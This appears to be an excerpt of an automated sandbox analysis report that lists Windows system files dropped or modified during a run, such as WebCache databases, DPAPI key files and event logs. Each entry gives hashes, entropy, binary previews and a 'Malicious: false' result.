SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk

Download File

Process:	C:\Windows\System32\dllhost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.41872441095459234
Encrypted:	false
SSDEEP:	12:VWterYeVHrYeVnQ/8WterYeVHrYeVnQ/:brYeVHrYeVnI6rYeVHrYeVnI
MD5:	9BBEAAA281CB65FF1C722C84390DC958
SHA1:	9250D880C886C1B39001146A96AF26A84F26B233
SHA-256:	B2CB74124F3216DB356C256CBDAEBB3D2D2DBF23A48967F800240729EC0DDDE8
SHA-512:	A5C42E5972987C79C897B3FD41E817EE497FF260DE0D7C947B426B922DB11B76E974675B8F6152A7053F1566AAB705B38B3AA432B57339768E6EB4F322B0AC11
Malicious:	false
Preview:	...b................0s......{..................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\............................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\.............................................................................................................................................................................................................0u...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log

Download File

Process:	C:\Windows\System32\dllhost.exe
File Type:	data
Category:	dropped
Size (bytes):	524288
Entropy (8bit):	0.8766678894591179
Encrypted:	false
SSDEEP:	768:c9qZKjZGzLmi4KEsezzN4q10Gss8J5vyCIfywotxUfl4Ck7P:c9UWGvT4qqLszFIuYY
MD5:	15CE2E9B35E41615C4719AD65BE15169
SHA1:	A6FEDA80A0C9A40693D1E26957D2257E3DB3F6BF
SHA-256:	1F915E15781E025EB11B941D8D7973EFCAA1998624D4840E9D3BA294C184D205
SHA-512:	293BEE0A38AE975A832167E84A8D0356473BFE39B88B447AA229C04E3BD19B12F5025BA476A0664119EA47FF7966F2558A095E86388D92B53E38F715B26F6522
Malicious:	false
Preview:	..Q%............."...{..:....{A.........<...0s......{..................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\............................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\.............................................................................................................................................................................................................0u.............................................R..........v.vv-.-..#......... ..........Y.......h.S.....5.Q......v.......{..................C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t..........................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat

Download File

Process:	C:\Windows\System32\dllhost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x978717e1, page size 32768, Windows version 10.0
Category:	dropped
Size (bytes):	15728640
Entropy (8bit):	0.9442000962193577
Encrypted:	false
SSDEEP:	12288:QcCS8rMTkTaTeUZT+T5SFnTKXpmlGVvK:QcrTGv
MD5:	D64BE24247DDAFF5F98E063A7CF687F4
SHA1:	4522BEE37BB05790B9997E07927F7F7B0615A4A1
SHA-256:	8F1DE150F3C22BCCA415726737365562CE84AA6D5C7EDA742473ACC1BA7F8D5C
SHA-512:	BF2987C6F116C41A0DBB4871F1DB9403943D5C007960DB5335B57CF551DADD48A20063E0B12DB2E8E706278654F08951B0212969D467E8576EA6560EA8A7CEF2
Malicious:	false
Preview:	....... .......!........v.......{..............................-9...}...9...}?.h.......-9...}..............0s......{..............................................................................................Y...........eJ......n........................................................................................................... ...........................................................................................................................................................................................................;....{..................................*..n-9...}.....................b-9...}...........................#..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm

Download File

Process:	C:\Windows\System32\dllhost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.12816565682947872
Encrypted:	false
SSDEEP:	6:df07LunqLO1YGkHgUqSslWON9FsnUP+0/nQfG:tuLuqLO1YKxlvXunqNQu
MD5:	814F9D2A7BF28837229DC3168F8C34FC
SHA1:	F1A654645DEA9F3D5D333523326E47ABC1732443
SHA-256:	AF8D3212131FB9195E4795B5DCDA4476E141C920BA5721BE188E8ECB26751345
SHA-512:	76C6E06F514B51CA2314AE7CC5FF14B7743D75D3D05A2E0412F336AD02D6A82971B38B53405D9B215F69D13B670BF04C04344B2DFC671D8ED9C80FFBA7C05ABB
Malicious:	false
Preview:	............................................{...9...}?.-9...}...........9...}M.-9...}.....?-9...}.....................b-9...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\18607d1f-3e87-41d7-b006-51bfc17e9538

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	dropped
Size (bytes):	468
Entropy (8bit):	6.397133308482136
Encrypted:	false
SSDEEP:	6:fjQ2i/o311PbMa0Fju1Ubrw2v4NA7wazt6zNRCZcoAsBhKwlBJAJfJF/E5dlrEBX:fj1Jujnr/vD8aMJZoAGMwlnsRF/E6Fn
MD5:	FB0C79C010876315EBB54B0852963B04
SHA1:	37D28B8F884FE87C3CDF2E04F64F2E03DC39002F
SHA-256:	CBF9CEC9D4E1304A0FF16AAE7DC0C6754EE3B8514F8C222096299A61690D0390
SHA-512:	A1953EA0BEA1AFC0C90FD1B4C93CF87E6AC7E46D3F79BA62B70717AE62A45646AF03A9EAAF25C1532C0548E8B3A9D0C8491B6723E4C4BB48A63D3D45ABE89E87
Malicious:	false
Preview:	............1.8.6.0.7.d.1.f.-.3.e.8.7.-.4.1.d.7.-.b.0.0.6.-.5.1.b.f.c.1.7.e.9.5.3.8..................................................-E.PJ..-!Z.T8e.@........f...!........$.I.P..b....q.s.+.s.:..\.......}......>..p ...\|0K:...W;t.#.7)..I:=L..M....f..}{..o.E..H>..b..'......^......5V.0...M.Y..GA..."........xN...Z.0....@........f....P.G....z....I..?.......<.r.l..t..k...t.P.+..h....TR.}Z.[Fj...W...p.^\|.:..t...x.....fM.s....*+."s..r.b.....K... ..M._.....n

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.501629167387823
Encrypted:	false
SSDEEP:	3:wJjS7j:wxEj
MD5:	ABB27CC79CE27666556007C97F241F04
SHA1:	8991A076F9B920557438B1D401CA6ADF8E44ED13
SHA-256:	BCA0EF9DDE18505110AA8F373D674D7FE78604DA4CD52769E358530F3C1CB59F
SHA-512:	842D00B6F5B1F840835AAF1572E04F09A389EBDC24BB619E3CA68DEF74C446E5E57B67CE72DED87FEA6FC59881D516008DA696D1C3DAE2B949287035EEC991E4
Malicious:	false
Preview:	.}`..>.A..Q..~.80.m.....

C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.334962500721156
Encrypted:	false
SSDEEP:	3:yBx/Bt:Ut
MD5:	5F25EA8637492647FA030E2A5AAA7ED1
SHA1:	DA1A8C76702E5A346DDDD4A5FC1958A5E567CE8B
SHA-256:	5BBFBDCD9181279C655C9523F619CD1A576142E65696AD09BE68190F9D6A4141
SHA-512:	EDD510DA4A4F9DBFA4AAAFAA4913BC36732AD2E46BD8958FB39C619A0F5B5039F1BE54A74F532BA0C390F37E3F3DC36D1A12F4069ACDBF797F3EC572E475B17B
Malicious:	false
Preview:	..1..+J.@....e.+......

C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\c8310f0f-9ec7-4a2b-8c40-fbafee991f65

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	dropped
Size (bytes):	468
Entropy (8bit):	6.175434731475477
Encrypted:	false
SSDEEP:	12:fnL5Glga1wRGjQgZRwEQrM7K4iezaEYEvUW93i6:fLInhQrM73ie2W9
MD5:	1701E9D6FB68E75F4B5E24D5F8865A55
SHA1:	A80B7D0E2B3BB3D083228A92325F76188FC33471
SHA-256:	1D7A294A8BEF01F20C4B4CEFE0E7C4959783B826D927BC7823D89B1049015176
SHA-512:	BBA7B85A33F71CB6D57DED486CBB21064AB6E1E23C69580393C721EA7A8F0BE6CC124B3D6CA10302A2EB5484C3F77EDF2B68BE0C0EC083039CE13F1CDC29876B
Malicious:	false
Preview:	............c.8.3.1.0.f.0.f.-.9.e.c.7.-.4.a.2.b.-.8.c.4.0.-.f.b.a.f.e.e.9.9.1.f.6.5..................................................N....Vd.&....@........f...Iiu.$w....#.........YX}....iO.U.6.../....D#.....C..f\/.`....6..}=...N...f...>....tY3.k.F.H..eP?.OC....Q...GN.h.....p.@..>0.....\|..l.W...)J>....{.9.Ln.S..G.;...@........f..g.n..8...OfY....s..d.~......)...{.).D...[..p.%..n...h.kd......z..?-a/.BO...x5..<O2g..d.... ...3C.WM..K..b....................

C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	4680
Entropy (8bit):	3.7113653380655913
Encrypted:	false
SSDEEP:	96:pYMguQII4i5lX6h4aGdinipV9ll7UY5HAmzQ+:9A4D/xne7HO+
MD5:	BA063C62EF76FC77690F80D6D92D0289
SHA1:	BA63C31A47DCCAF2EC1DC61E08394D6C4C54C9EF
SHA-256:	1C0E4BBD362E3C18641820FD603297EF0CAA9BDE111BE528F5DC662499646B6B
SHA-512:	16AB4318B0E3078B9629873ACF098EA9502D1E193DFFF3175CB85C7AC32D0ADEE0D0A001D3DF79FC710DD3FF2ADF80AB2F3C98B826A1090C4B16535D0D4907AD
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	dropped
Size (bytes):	11136
Entropy (8bit):	7.978022444004817
Encrypted:	false
SSDEEP:	192:tszsSW/556/yFaU3lkOKTNOme7uiPBk2jP4SkBoCUjU/mAh+Uk8Gy8DR9b:tNEZU1kOKTIdVJn6oCUkmAh+UkhzDzb
MD5:	9E0365D56A2CD857D810BA60DCF61976
SHA1:	098B4956F87612D7F5EBCAA2B9925023BA3A0F68
SHA-256:	30820468AD9E18920A9F485C16CE586E205A3131E837FF04CABDE5270CA7F8D4
SHA-512:	255828C8371F99C3A8ACCC91B3614850D2B715D18E696434069681736498A4769E5662831F2FEE5538120505D03ED1F344D6C4270BB6545DBE83A4E978DE79A8
Malicious:	false
Preview:	....t+..................z..O........1..+J.@....e... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... .......&...~..-zU..;...n.........]............ ......NV.N9...>K(..>.?.o...8].-1].p..U...1....F..........X....}<%;z..[v...pe;/...G..-.r.5..Ry.w..+.c...H.-..Q..!..kX@...-h9.......>..^/...C..g.,sOZj...cs-.......&LF....D....;n.s#...~..^..\|.r.{jjv....8e......5....+\.\.%w.x.....P.7...-...:.....Q.T..~j..j..[....f.j.H`.`..\.....i....&..]%(.........@......(f`..y..d...B.G....:B..c.20.....P.-J,....+.y..........".....L.K...1p\|[^.V.....w.X..b........W..W..(.!2...8u_J.jn.......P...8.X2..d...#.2..'.+.${.....'.8...4.W..ix..8..."..Y...Q)...jR5_.\hX[F..`........s..>..W4M(.&_\.W...1..1-....4....F..O'..]...V....d-.....0n.Y.........h..]d...i;.G.sf?..m..O.JD...-...c./._.FX.p..90....H`9...d+%.?.h.\|m...\.v,n7..\|..d........q..nP9j.8....0.C.R\.!..]..9j.)?..........x......G..EF.6....{.....z.~L.'...?.ga..N.l.uf...$.Dq.6.l.3..uU}..y.DP..].....v.7v.

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	8176
Entropy (8bit):	3.9135114845749834
Encrypted:	false
SSDEEP:	192:JjYXjPJRVGZzpbZKpbuShfpGzpbPatmkt5R:JjYTPJCzVZKVuShfOVPvk
MD5:	1F946CF0DDC0F02A09FCF99F4CAA0219
SHA1:	1F550AAD208F1039A30F40427DD1402928EED635
SHA-256:	03106C9C7CE45A299B6DA7C18A55F15FDE0930B3D9F3F38A39439E3C73D473FC
SHA-512:	6D784A51F59884880821B3DEA8F8C0CD4CA7F66E1B25D02119D30E7EC91EF9F6E110DD4F0685B7EA71C4FDA5BB1E2F0AE80664527263BFC810759E15416A6D30
Malicious:	false
Preview:	ElfChnk.................[.......`...........h..............................................................................V.ck................y...........................=...................................................................................r...................................t...?...........................................F...................M...5...........................R...........................&.......v...................................v...............................................**..P...[..........'fg.........=F.&........=F.m.^.V..7...y.......A..m...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..2............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.A.P.I.2.F........)...G.u.i.d.....&.{.5.b.b.c.a.4.a.8.-.b.2.0.9.-.4.8.d.c.-.a.8.c.7.-.b.2.3.d.3.e.5.2.1.6.f.b.}.

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 310, DIRTY
Category:	dropped
Size (bytes):	112664
Entropy (8bit):	3.7407323185353833
Encrypted:	false
SSDEEP:	768:CVUHiapX7xadptrDT9W84H63VUHiapX7xadptrDT9W84H6:9Hi6xadptrX9WPaWHi6xadptrX9WPa
MD5:	98A140380B258B0A04E638D1B6CFE0B0
SHA1:	C0A7ADD444AA576EE21B7C1AED37BEEA52A1FC59
SHA-256:	03F3C14030F5A53C49FDCAD5B9EE5401B39F96BCC968373C7F6D39C803B82EA0
SHA-512:	AF355A512504BDF1B4919E1FA28A27CA74A658DC07B45EDBF03EF0C11E1FF4F73654E8AC5A657DED60BB68F7B878242FCE98F56681877D389D2AB5140388D65B
Malicious:	false
Preview:	ElfFile.................6....................................................................................................I].ElfChnk.........7...............7..............................................................................................%................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.377721629524822
Encrypted:	false
SSDEEP:	384:fhZN/GN6N/NDsNadNDtNkN6NQNQxNhdNQaNwNwNONPNavNqN6NfNjNALNCNyN7Ns:fZeIPRThtUmqYXL3QXr0Q7
MD5:	B59AFB7FCA4C7067FBB3EF413064809B
SHA1:	785A500AA8ADA1D59F3F7FD48E876F2305E7072D
SHA-256:	ED35583D239B8BBF565E20C872268401F9D05A4DCCE4ABA7F83BA99A5978FD95
SHA-512:	C86B8AE075AA4E669D9DE8EDC1C3E430D68F1A155153EE7B4C7B1898E03E42334C37FFAE7CD35B759EB019822762C7048083BEA711439FAA1D869360CE59CD88
Malicious:	false
Preview:	ElfChnk.{...............{..........................[.x......................................................................D.\........................................V...=...........................................................................................................................f...............?...........................m...................M...F...................=c......................=j...........................?......]...............................................-g..................**......{.......n=.df..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	4.271873510615837
Encrypted:	false
SSDEEP:	384:8izVJVQVLVbVOV5VrVQ9VMV1hMVnRVSV3V9VbVSV5VjVMV/V1VQVPTV0V6V6VoV6:8iSs+HbiSqi20Hl6Mun
MD5:	44D5AE36A070F68A241685B4E96EAA5D
SHA1:	8093755D27230DC115B3B2A1FECB05D923BF68C2
SHA-256:	938DF9D2E6D83C883A74ECF021CD6D53F529663F619178A93A733D331E2691C3
SHA-512:	D4875C105231092A02466218C8E0D1A33A3776FC541E773DD4D6FF5007F4718ABA0FCCB84D64079490E6AE4F8624440A96213A09289EF1BCC2848E94A80890AD
Malicious:	false
Preview:	ElfChnk.....................................8_...a..7T......................................................................z..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................9@...............................=....................!.r.g..........Z..&...............................................................@.......X..._.!.....E..........@!.r.g...0.U.f...=,U.f................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........L...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s.A.l.a.r.m.s._.8.w.e.k.y.b.3.d.8.b.b.w.e.....n.d.o....................s.g..........Z

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67008
Entropy (8bit):	4.181475051527736
Encrypted:	false
SSDEEP:	384:XmnmChsmsmi7mRXZmVkWmhTimmdmBmKmPhmRTmimZ8mevmcsm7mrmQmzmjmvmTm4:q2klTiGFKX93WGUGbeOg26
MD5:	AEF52638B1DC27DC32933C3A8FE08356
SHA1:	BDBA9289333E6A9A4DB2469DDE932967EE30B2EC
SHA-256:	F1D7615319E659607A5A89B559A2BBC2F8D4D114BBB6799AA014B9A151FADD88
SHA-512:	C66E78658840DF1D4305609691A7660D78D140FE53E8B5DEBA9388522BB81172CBE2C01CDEA9DE0F4396729E0C4E61975364D31C516CB151B95BF6F60E7FCC86
Malicious:	false
Preview:	ElfChnk.@-......o-......@-......o-..........(.......J.........................................................................................\...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................5...c#..{1..k:...................v................n-......ai..g..........Z..&...............................................................N.......d..._.!.....[..........@ai..g...0.U.f....!U.f...$.......n-...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.-.S.e.r.v.e.r.9.G?...J...]..-CM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.S.e.r.v.e.r./.O.p.e.r.a.t.i.o.n.a.l...e$W..R......................(.....................s.v.c.h.o.s.t...e.x.e.,.S.t.o.r.S.v.c........-...........

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 4, DIRTY
Category:	dropped
Size (bytes):	70680
Entropy (8bit):	0.7871625590975453
Encrypted:	false
SSDEEP:	192:P8V7pp8nMLkmp8nPp8nkMvop8nwV7pp8nMLkmp8nPp8nkMvop8n:P8hpiMLxiPikMwiwhpiMLxiPikMwi
MD5:	3BA8E0733B35DFA9A0067A622B9C0677
SHA1:	7700E60AEA9634D386F583C32E99E2F3139AB0C3
SHA-256:	E85BB8D391E033F7669FDA1500BBDF3493865E653FFBE26166FEAEDBC6FCE685
SHA-512:	94BC6E370BA90AA6CD1DAB79A906E1F337B158F7D3324096EC1E6D0A9FAE2F4A686BF485A76B48A1920276246C5485C2BC01EBCB1F696BF504D51D3CF192BDAD
Malicious:	false
Preview:	ElfFile.........................................................................................................................ElfChnk.....................................@........[B.....................................................................=...............................................=...........................................................................................................................f...............?...................................p...........M...F...............................................f...................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.467947111655398
Encrypted:	false
SSDEEP:	1536:xZPZn2bBN2A4VD7VAx8whAGU2woJQghwMvOUFwe8OQhNwRA:
MD5:	6B473E7917B1EDEE80CAFE7D24A6A4E8
SHA1:	1940F41550F2986C928648ED00F9C6E4868D1A23
SHA-256:	1D52F13D2EA4ACC472815240DBFF0F34C6CD5E86F980D04D9AD28E42C3E7A355
SHA-512:	9AABAD5B7425A9692545864C11B99DDED0051CE8B442FFAB7BAB21DD8CD68B51BC980B01F324A81C685DC56793581AE2E6751DD08497CCBA64FB3339A9B5483D
Malicious:	false
Preview:	ElfChnk.e.......h.......e.......h...............x....;.......................................................................Z}............................................=...............y...........................................................................................................L...............?...............................................M...F...............................................&...................................................................................n...............**......e..........f..........'.z&........'.z..^................A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.565838744973026
Encrypted:	false
SSDEEP:	1536:PXY5nVYIyyqED5BVZUe39vHxt1BSocM1:PXY5nVYIyyqED5BVZUe39vHxt1BSot
MD5:	B30C931B9EF047307E1443502CE7EE14
SHA1:	BAC3632B709B853DFFCD9C4D65D1F9236F6FE551
SHA-256:	033CF49641F4E76EFABF8F25753074E7EE72DD567FBA4145D446032D3D9CFADB
SHA-512:	F5A9CA2D464EBA1F2F4EA426AC3864FB399A8951958BA44BA550E2129C4F4D4DA9E60F0D1B18A07CC76D4BC2CFD20D283F446A47DF990B52916113D5383A1952
Malicious:	false
Preview:	ElfChnk.........~...............~...................F..........................................................................T................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................N...............y.......................**................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	93880
Entropy (8bit):	2.1481786625447885
Encrypted:	false
SSDEEP:	384:BosKooAhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorXorWorxFo8ory:HDCFUDCF35
MD5:	5EEBBC1CE5CA3E469B5FCA1097EB12DE
SHA1:	CC540EAEEF97F6854C95F3DC35B7F479EAB327A5
SHA-256:	A9D20784F3B6618E740F559CEE42F74F6B87C6C392A0E0484838E50511818BD8
SHA-512:	EF8F441CFB68245784F2532D4A679AC4B82F24485501A3372096A2A21416BE1F23481C2A11D2BB7FF15D6F7E6396CE8A97B37693098A0806811692F289619A99
Malicious:	false
Preview:	ElfChnk......................................+...-..T..f.....................................................................b.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................ ......U)..............................**..................fg.........Z... ..............................................................>.......V...X.!..e..................fg..0.U.f....1U.f................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........\|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8511209646626153
Encrypted:	false
SSDEEP:	384:ChAiPA5PNPxPEPHPhPEPmPSPRP3PoPbPfP0bPnPdP:C2NZ
MD5:	A98C811B8E1B821CD1FE05A68ADD446A
SHA1:	4E8B739F5E308F943962E72FF24212FFBE47FAD7
SHA-256:	58F6584C100174B80ACB8940226841B77884326A293CEE9072F4DD4CF8C10133
SHA-512:	24A7B9C86A6CE93B9B7F4107A433A247789EE568EB69E301B51DC9D01AA40D2F408AD76B78F7F83E5F4EB47C1677276BC86F86A99BAB95186C2331ABE4CA523C
Malicious:	false
Preview:	ElfChnk......................................%...&..?........................................................................<.m................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................ ..............'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

